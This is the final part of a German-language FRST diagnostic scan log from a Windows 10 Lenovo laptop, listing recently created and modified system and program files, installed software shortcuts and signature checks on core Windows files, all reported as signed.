C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task 2017-06-08 09:08 - 2017-06-08 09:08 - 00003404 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier 2017-06-08 09:08 - 2017-06-08 09:08 - 00003118 _____ C:\WINDOWS\System32\Tasks\Intel PTT EK Recertification 2017-06-08 09:08 - 2017-06-08 09:08 - 00002340 _____ C:\WINDOWS\System32\Tasks\{D47AB256-778C-4756-BFF4-B5F38C8A441A} 2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_LENOVO_MICPKEY 2017-06-08 09:08 - 2017-06-08 09:08 - 00002336 _____ C:\WINDOWS\System32\Tasks\{C33EC7F1-7E6C-4635-A9D8-DE9B48C4F5F2} 2017-06-08 09:08 - 2017-06-08 09:08 - 00002306 _____ C:\WINDOWS\System32\Tasks\RtHDVBg_Dolby 2017-06-08 09:08 - 2017-06-08 09:08 - 00002280 _____ C:\WINDOWS\System32\Tasks\RTKCPL 2017-06-08 09:08 - 2017-06-08 09:08 - 00002274 _____ C:\WINDOWS\System32\Tasks\DolbySelectorTask 2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\WPD 2017-06-08 09:08 - 2017-06-08 09:08 - 00000000 ____D C:\WINDOWS\System32\Tasks\Lenovo 2017-06-08 09:05 - 2017-06-08 09:05 - 00001519 _____ 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2017-06-08 09:01 - 2017-06-08 09:06 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate 2017-06-08 09:01 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Common Files\SpeechEngines 2017-06-08 09:00 - 2017-07-05 21:30 - 00000000 ____D C:\ProgramData\Synaptics 2017-06-08 09:00 - 2017-07-04 21:38 - 02417936 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2017-06-08 09:00 - 2017-06-30 07:49 - 00000000 ____D C:\Users\ararat 2017-06-08 09:00 - 2017-06-08 09:07 - 00000000 ____D C:\Users\DefaultAppPool 2017-06-08 09:00 - 2017-06-08 09:00 - 02011386 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Vorlagen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Startmenü 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Netzwerkumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Lokale Einstellungen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Eigene Dateien 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Druckumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Videos 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Musik 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Eigene Bilder 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Verlauf 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\DefaultAppPool\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 
00000000 _SHDL C:\Users\ararat\Vorlagen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Startmenü 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Netzwerkumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Lokale Einstellungen 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Eigene Dateien 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Druckumgebung 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Videos 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Musik 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Documents\Eigene Bilder 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Verlauf 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\AppData\Local\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 _SHDL C:\Users\ararat\Anwendungsdaten 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WUDFUsbccidDriver_01_11_00.Wdf 2017-06-08 09:00 - 2017-06-08 09:00 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_wbf_vfs_lvcmn_01_11_00.Wdf 2017-06-08 09:00 - 2017-05-01 22:51 - 06437312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 02479552 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 01762752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00548800 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshext.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00392312 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmctray.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00146880 _____ (NVIDIA Corporation) 
C:\WINDOWS\SysWOW64\oemdspif.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00081856 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nv3dappshextr.dll 2017-06-08 09:00 - 2017-05-01 22:51 - 00069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll 2017-06-08 09:00 - 2017-04-25 23:11 - 07944687 _____ C:\WINDOWS\system32\nvcoproc.bin 2017-06-08 08:59 - 2017-07-05 21:30 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2017-06-08 08:59 - 2017-07-05 21:30 - 00000000 ____D C:\ProgramData\NVIDIA 2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\ProgramData\NVIDIA Corporation 2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation 2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\NVIDIA Corporation 2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Intel 2017-06-08 08:59 - 2017-06-08 09:00 - 00000000 ____D C:\Program Files\Synaptics 2017-06-08 08:59 - 2017-06-08 08:59 - 00044875 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip 2017-06-08 08:59 - 2017-06-08 08:59 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_Smb_driver_Intel_01011.Wdf 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\ProgramData\DP45977C.lfl 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\system32\DAX2 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\Program Files\Realtek 2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin 2017-06-08 08:59 - 2017-05-01 22:52 - 00001951 _____ C:\WINDOWS\NvContainerRecovery.bat 2017-06-08 08:59 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) 
C:\WINDOWS\SysWOW64\PrintConfig.dll 2017-06-08 08:59 - 2016-11-02 00:05 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL 2017-06-08 08:58 - 2017-07-05 21:30 - 04916088 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2017-06-08 08:58 - 2017-07-05 21:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2017-06-05 22:24 - 2017-06-12 21:54 - 00000000 ___DC C:\WINDOWS\Panther 2017-06-05 10:50 - 2017-06-05 10:50 - 00257864 _____ (Lenovo Group Limited) C:\WINDOWS\system32\iMDriverHelper.dll ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2017-07-05 21:30 - 2016-02-11 22:02 - 00000000 __SHD C:\Users\ararat\IntelGraphicsProfiles 2017-07-05 21:29 - 2017-03-18 13:40 - 00524288 _____ C:\WINDOWS\system32\config\BBI 2017-07-05 21:20 - 2016-02-23 19:39 - 00000000 ____D C:\Users\ararat\AppData\LocalLow\Temp 2017-07-04 22:54 - 2016-10-25 19:04 - 00000000 ____D C:\Users\ararat\Documents\Tickets 2017-07-04 21:38 - 2017-03-20 06:41 - 01067190 _____ C:\WINDOWS\system32\perfh007.dat 2017-07-04 21:38 - 2017-03-20 06:41 - 00247464 _____ C:\WINDOWS\system32\perfc007.dat 2017-07-04 21:38 - 2016-11-19 13:21 - 00136439 _____ C:\WINDOWS\system32\InstallUtil.InstallLog 2017-07-04 21:34 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps 2017-07-04 21:34 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness 2017-07-03 21:28 - 2016-03-27 18:17 - 00000000 ____D C:\Program Files\Common Files\Adobe 2017-07-03 21:28 - 2016-03-27 18:17 - 00000000 ____D C:\Program Files\Adobe 2017-07-03 21:28 - 2016-02-23 23:18 - 00000000 ____D C:\Program Files (x86)\Adobe 2017-07-03 21:28 - 2016-02-23 23:10 - 00000000 ____D C:\ProgramData\Adobe 2017-06-27 22:23 - 2016-02-23 22:19 - 00000000 ____D C:\Program Files (x86)\Dropbox 2017-06-27 21:00 - 2016-02-23 23:03 - 00000321 _____ C:\Users\ararat\Documents\BIMx_Export_Log.txt 2017-06-27 21:00 - 2016-02-23 23:03 - 00000000 ____D 
C:\Users\ararat\Graphisoft 2017-06-27 20:26 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Documents\BIMx 2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Spotify 2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Local\Spotify 2017-06-22 09:12 - 2016-02-23 22:22 - 00000000 ___RD C:\Users\ararat\Dropbox 2017-06-21 22:52 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF 2017-06-19 22:57 - 2016-02-23 22:19 - 00000000 ____D C:\Users\ararat\AppData\Local\Dropbox 2017-06-19 21:59 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache 2017-06-15 19:05 - 2016-02-12 20:16 - 00000000 __RHD C:\Users\Public\AccountPictures 2017-06-14 22:12 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe 2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser 2017-06-14 20:33 - 2016-02-11 21:55 - 00000000 ____D C:\WINDOWS\system32\MRT 2017-06-14 20:32 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp 2017-06-14 20:32 - 2016-02-11 21:55 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2017-06-14 20:22 - 2016-02-12 20:18 - 00002435 _____ C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-06-14 20:22 - 2016-02-12 20:18 - 00000000 ___RD C:\Users\ararat\OneDrive 2017-06-13 08:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat 2017-06-13 08:53 - 2016-02-12 20:16 - 00000000 ____D C:\Users\ararat\AppData\Local\Packages 2017-06-12 21:57 - 2016-09-17 15:35 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Skype 2017-06-12 21:54 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2017-06-08 09:58 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2017-06-08 09:54 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12 2017-06-08 
09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___RD C:\Program Files\Windows Defender 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer 2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer 2017-06-08 09:54 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism 2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI 2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\inetsrv 2017-06-08 09:48 - 2017-03-18 22:59 - 00611840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqutil.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqrt.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa30.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa20.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll 2017-06-08 09:48 - 2017-03-18 
22:59 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa10.tlb 2017-06-08 09:48 - 2017-03-18 22:59 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe 2017-06-08 09:48 - 2017-03-18 22:59 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe 2017-06-08 09:48 - 2017-03-18 22:59 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\cngkeyhelper.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cngkeyhelper.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll 2017-06-08 09:48 - 2017-03-18 22:59 - 00009096 _____ C:\WINDOWS\SysWOW64\msmqtrc.mof 2017-06-08 09:48 - 2017-03-18 22:56 - 01380352 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00222720 _____ (Microsoft Corporation) 
C:\WINDOWS\system32\mqrt.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys 2017-06-08 09:48 - 2017-03-18 22:56 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe 2017-06-08 09:48 - 2017-03-18 22:56 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb 2017-06-08 09:48 - 2017-03-18 22:56 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe 2017-06-08 09:48 - 2017-03-18 22:56 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll 2017-06-08 09:48 - 2017-03-18 22:56 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof 2017-06-08 09:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate 2017-06-08 09:13 - 2016-09-24 14:37 - 00000000 ____D C:\Program Files (x86)\SunplusIT Integrated Camera 2017-06-08 09:11 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT 2017-06-08 09:10 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2017-06-08 09:10 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM 2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration 2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-06-08 09:09 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2017-06-08 09:08 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell 2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media 2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RHD 
C:\Users\Public\Libraries 2017-06-08 09:08 - 2016-02-12 19:33 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat 2017-06-08 09:06 - 2017-05-18 08:30 - 00000000 ____D C:\WINDOWS\system32\UNP 2017-06-08 09:06 - 2017-05-01 17:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rhinoceros 5 2017-06-08 09:06 - 2016-07-14 22:45 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.2 2017-06-08 09:06 - 2016-07-09 22:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2017-06-08 09:06 - 2016-04-21 18:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 3ds Max 2015 2017-06-08 09:06 - 2016-04-21 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 2017-06-08 09:06 - 2016-03-23 19:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScummVM 2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WibuKey 2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeMeter 2017-06-08 09:06 - 2016-02-23 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GRAPHISOFT 2017-06-08 09:06 - 2016-02-23 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2017-06-08 09:06 - 2016-02-21 19:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client 2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2017-06-08 09:06 - 2016-02-13 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRWare Iron (64-Bit) 2017-06-08 09:06 - 2016-02-12 20:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dolby 2017-06-08 09:06 
- 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\SysWOW64\NV 2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\system32\NV 2017-06-08 09:05 - 2015-10-30 08:28 - 00000000 ____D C:\Users\Default.migrated 2017-06-08 09:02 - 2017-05-28 09:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype 2017-06-08 09:02 - 2017-03-20 06:42 - 00000000 ____D C:\WINDOWS\OCR 2017-06-08 09:02 - 2017-03-20 06:41 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\IME 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\NDF 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\IME 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\schemas 2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions 2017-06-08 09:02 - 2017-03-13 19:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Itoo Software 2017-06-08 09:02 - 2016-11-15 23:08 - 00000000 ___HD C:\WINDOWS\system32\WLANProfiles 2017-06-08 09:02 - 2016-10-22 10:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexicon 2017-06-08 09:02 - 2016-10-22 09:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IK Multimedia 2017-06-08 09:02 - 2016-07-15 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo 2017-06-08 09:02 - 2016-05-07 11:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel 2017-06-08 09:02 - 2016-04-21 21:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chaos Group 2017-06-08 09:02 - 2016-04-21 18:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk Backburner 2015 2017-06-08 09:02 - 2016-02-12 20:24 - 00000000 ____D 
C:\WINDOWS\SysWOW64\sda 2017-06-08 09:02 - 2016-02-11 22:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation 2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files\Windows Sidebar 2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv 2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2017-06-08 09:01 - 2017-03-13 19:32 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Itoo Software 2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Help 2017-06-08 09:00 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2017-06-08 08:59 - 2016-02-11 20:23 - 00000000 ____D C:\Intel ==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ======= 2016-08-02 21:46 - 2017-04-03 21:08 - 0000132 _____ () C:\Users\ararat\AppData\Roaming\Adobe PNG Format CS6 Prefs 2016-11-04 00:45 - 2017-03-10 23:52 - 0001456 _____ () C:\Users\ararat\AppData\Local\Adobe Save for Web 13.0 Prefs 2017-07-05 21:30 - 2017-07-05 21:30 - 0000000 ____H () C:\ProgramData\cm-lock 2017-06-08 08:59 - 2017-06-08 08:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl ==================== Bamital & volsnap ====================== (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) 
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-07-03 01:25
==================== Ende von FRST.txt ============================